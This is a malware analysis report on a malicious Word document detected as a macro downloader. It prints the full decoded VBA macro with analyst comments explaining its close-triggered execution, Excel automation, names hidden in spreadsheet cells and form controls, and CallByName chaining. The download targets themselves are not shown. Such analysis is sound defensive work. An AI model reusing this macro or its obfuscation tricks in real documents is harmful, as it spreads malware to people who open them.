Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 09a1b5d510b287f5…

MALICIOUS

Office (OOXML)

Size: 82.3 KB
Created: 2021-01-29 12:37:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: c14814bdeccb91be87b41695c6f192b9
SHA-1: cc292eea937c6d647da7eda982ae27706223a531
SHA-256: 09a1b5d510b287f528830daefafec6c04ca1df23a6496e8d500f1db93377c0d5
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML [medium, 2 related findings] OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    Set vp8 = CreateObject(UserForm1.nt & UserForm1.gb)
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Matched line in script:
    Set pb = CallByName(vp8.Workbooks, UserForm1.bg & UserForm1.b, 1, UserForm2.ComboBox1, , , , UserForm1.ov)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the channel label on each URL (macro, JS, link annotation, document body, ...) shows which part of the file reached it. Every URL extracted from this sample is labelled "In document text (OOXML body / shared strings)", and all of them are XML namespace URIs from the document markup rather than links the macro contacts.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 6971 bytes
SHA-256: 40c6aefeae9d609bbda58580d258f97a0835846214f0e282c104844336f7c9a2
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


' Globals shared with the UserForm modules, which read them as ActiveDocument.<name>
Public f7, ai, fg, ajl, tg0, vp8, hz, kz, knt, q8b, xo, nd, k5, ez, qt, cs

' Entry point: the macro runs when the document is closed, not on open
Sub Document_Close()
    et
End Sub

Sub et()
    ' Suppress every runtime error for the rest of the routine
    On Error Resume Next
    UserForm2.ComboBox1.ListIndex = 5
    ' ProgID assembled from two UserForm1 control values (string-splitting obfuscation);
    ' the .Workbooks/.sheets/.DisplayAlerts/.Quit members used below indicate an Excel automation object
    Set vp8 = CreateObject(UserForm1.nt & UserForm1.gb)
    vp8.DisplayAlerts = False
    z7 = 1301
    tpd = 0
    Err.Number = 0
    ' At most two attempts to invoke a Workbooks method by name (CallByName type 1 = VbMethod);
    ' the method name and the arguments come from form controls, so the source never spells them out
    While z7 <> 0 And tpd < 32
        Set pb = CallByName(vp8.Workbooks, UserForm1.bg & UserForm1.b, 1, UserForm2.ComboBox1, , , , UserForm1.ov)
        z7 = Err.Number
        tpd = tpd + 16
    Wend
    If z7 <> 0 Then
        qe = UserForm2.ComboBox4
ErrHandler:
        ' Fallback path: read an Application property by name (type 2 = VbGet), then pass a time
        ' 2 or 17 seconds in the future plus a procedure name ending in "et", consistent with a delayed retry
        ij = CallByName(Application, UserForm1.zb9 & UserForm1.mj, 2)
        If ij <> False Then
            Set li = CreateObject(UserForm1.g3 & UserForm1.kg)
            CallByName li.Documents, UserForm1.bg & UserForm1.b, 1, ActiveDocument.FullName, , True
            ff = UserForm2.ComboBox26
            g5 = UserForm2.ComboBox15
            CallByName li, UserForm1.eu & UserForm1.ow, 1, Now + TimeSerial(0, 0, 2), UserForm1.ec & UserForm1.kq6 & "et"
        Else
            ve = UserForm2.ComboBox12
            CallByName Application, UserForm1.eu & UserForm1.ow, 1, Now + TimeSerial(0, 0, 17), UserForm1.ec & UserForm1.kq6 & "et"
        End If
        vp8.Quit
        Exit Sub
    End If
    Dim je
    Set je = vp8.sheets(1)
    bb = "'"
    ' Guard: an empty A1 on sheet 5 sends execution to the fallback path unless the workbook title is "Google"
    cs = vp8.sheets(5).Cells(1, 1)
    If Len(cs) < 1 Then
        If vp8.ActiveWorkbook.Title <> "Google" Then
            GoTo ErrHandler
        Else
            Exit Sub
        End If
    End If
    ' Every ProgID, method and property name used from here on is read from spreadsheet cells,
    ' so none of them appear in the static VBA source; assignments to never-read locals (m3, lt, af, ...) are filler
    lg = je.Cells(94, 28).Value
    m3 = UserForm2.ComboBox20
    bs = je.Cells(7, 14).Value
    q8b = vp8.sheets(1).Cells(122, 34).Value
    xo = vp8.sheets(2).Cells(21, 55).Value
    tg0 = vp8.sheets(2).Cells(76, 31).Value
    f8d = vp8.sheets(2).Cells(142, 60).Value
    lt = UserForm2.ComboBox7
    fr6 = je.Cells(128, 38).Value
    b2 = vp8.sheets(3).Cells(54, 34).Value
    uk1 = vp8.sheets(2).Cells(143, 20).Value
    om = je.Cells(29, 52).Value
    k5 = vp8.sheets(2).Cells(65, 27).Value
    hz = vp8.sheets(1).Cells(124, 1).Value
    af = UserForm2.ComboBox15
    knt = vp8.sheets(3).Cells(94, 51).Value
    bnr = vp8.sheets(3).Cells(38, 31).Value
    r7 = vp8.sheets(2).Cells(119, 1).Value
    nd = vp8.sheets(1).Cells(55, 56).Value
    kn = vp8.sheets(1).Cells(53, 40).Value
    jly = vp8.sheets(2).Cells(38, 9).Value
    f7 = vp8.sheets(3).Cells(39, 8).Value
    jn = vp8.sheets(3).Cells(133, 39).Value
    r8 = vp8.sheets(1).Cells(149, 18).Value
    kz = vp8.sheets(3).Cells(112, 29).Value
    ai = vp8.sheets(3).Cells(76, 27).Value
    j0 = vp8.sheets(3).Cells(76, 30).Value
    d7 = vp8.sheets(2).Cells(63, 33).Value
    e3 = UserForm2.ComboBox6
    ' Column A of sheet 4 is concatenated row by row into qt until the first empty cell
    qt = ""
    Set Sh1 = vp8.sheets(4)
    a3 = 1
    gz = True
    While gz
        dt = Sh1.Cells(a3, 1).Value
        If Len(dt) < 1 Then
            gz = False
        Else
            qt = qt & dt
        End If
        a3 = a3 + 1
    Wend
    ' Dynamic dispatch through CallByName with the names loaded above; the first reference to
    ' UserForm5/UserForm3/UserForm4 loads that form and fires its UserForm_Initialize, which continues the chain
    nq = CallByName(vp8, om, 2)
    UserForm1.iq.Value = fr6 & nq & jly
    dz = UserForm2.ComboBox15
    UserForm1.i5.Value = bs
    CallByName CreateObject(d7), r8, 1, UserForm1.iq, kn, UserForm1.i5
    Set q5 = CreateObject(lg)
    Set mc = CallByName(q5, f8d, 2)
    nz = UserForm2.ComboBox5
    Set f6 = CallByName(mc, j0, 1)
    Set knt = CallByName(q5, knt, 2)
    ga = UserForm2.ComboBox17
    Set ajl = q5
    UserForm5.ComboBox1 = "a6"
    Set f7 = CallByName(ez, f7, 2)
    kz = CallByName(f7, kz, 2)
    b4 = UserForm2.ComboBox5
    UserForm1.ic.Value = jn & b2
    UserForm3.ComboBox1 = uk1
    cc = UserForm2.ComboBox17
    UserForm1.ic.Value = bnr
    r4 = UserForm2.ComboBox12
    UserForm4.ComboBox1 = UserForm3.ComboBox1
    g = UserForm2.ComboBox16
    UserForm3.ComboBox1 = kz
    ' Overwrite the object references with undefined names (Empty under On Error Resume Next)
    q5 = ml
    la = UserForm2.ComboBox27
    dd = UserForm2.ComboBox12
    pb = k9
    je = jx
    mc = b8
    f6 = db0
    knt = v1e
    q8b = qb
    xo = a
    ez = hs
    f7 = cn
    ajl = hx
    DoEvents
    ' Final method call on the automation object by name, then drop the reference
    CallByName vp8, r7, 1
    vp8 = j2
    vq = UserForm2.ComboBox6
    jk = UserForm2.ComboBox7
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C4591392-2F63-454D-A3C4-29B0AE36FE73}{F7CF552D-8C08-4868-A5FC-C62F7C9A78B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{F3F23911-77BB-4C5D-9F6C-680A9F783DC8}{0E2203DC-943C-4714-AF36-B8B64E7856D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    ' Concatenate the default value of every second control on this form into m8
    q0 = UserForm2.Controls.Count - 1
    r6 = UserForm2.ComboBox10
    m8 = ""
    pm = UserForm2.ComboBox9
    For bq = 1 To q0 Step 2
        m8 = m8 & UserForm2.Controls.Item(bq)
    Next
    ' ComboBox1 items by index: 0 "f8", 1 "zg", 2 "ei", 3 "ed", 4 "i3", 5 m8, 6 "gz";
    ' et() selects index 5, so the value handed to the Workbooks call is m8
    ComboBox1.AddItem "f8"
    ComboBox1.AddItem "zg"
    ComboBox1.AddItem "ei"
    l5 = UserForm2.ComboBox6
    ComboBox1.AddItem "ed"
    ComboBox1.AddItem "i3"
    ComboBox1.AddItem m8
    ComboBox1.AddItem "gz"
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{A9805F70-02DB-4067-9D6E-E3A6994455D4}{2E1A5DB0-39D4-4A63-ACC1-8D5D42B25C91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    ' Fires when et() first touches UserForm3; invokes methods on the f7 object using names read from the workbook
    CallByName ActiveDocument.f7, ActiveDocument.hz, VbMethod, 1, ActiveDocument.kz
    CallByName ActiveDocument.f7, ActiveDocument.ai, VbMethod, UserForm1.ic.Value
End Sub

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{EF0D0335-219B-4A79-A790-4B60037D07CE}{00E680D7-5960-4695-A23F-447950ABC9FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    ' Fires when et() first touches UserForm4; passes the sheet-4 column A string (qt) and the sheet-5 A1 value (cs)
    CallByName ActiveDocument.ajl, ActiveDocument.tg0, VbMethod, UserForm1.ic.Value, ActiveDocument.qt, ActiveDocument.cs
End Sub

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{D0E00784-E191-4D52-B04D-F683BB300A3A}{98A9FD73-12F2-4DF7-B73F-404A5617E803}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    ' Fires when et() first touches UserForm5; walks a chain of property gets (VbGet) on objects
    ' named in the workbook and stores the resulting object in the global ez, which et() uses next
    Set ActiveDocument.q8b = CallByName(ActiveDocument.knt, ActiveDocument.q8b, VbGet)
    Set ActiveDocument.xo = CallByName(ActiveDocument.q8b, ActiveDocument.xo, VbGet)
    Set ActiveDocument.ez = CallByName(ActiveDocument.xo, ActiveDocument.nd, VbMethod, ActiveDocument.k5)
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 50688 bytes
SHA-256: b2195b39d55aa8a0898fc6a524f158906411df785cec9a6822ce8e942dbaec40
Detection: ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely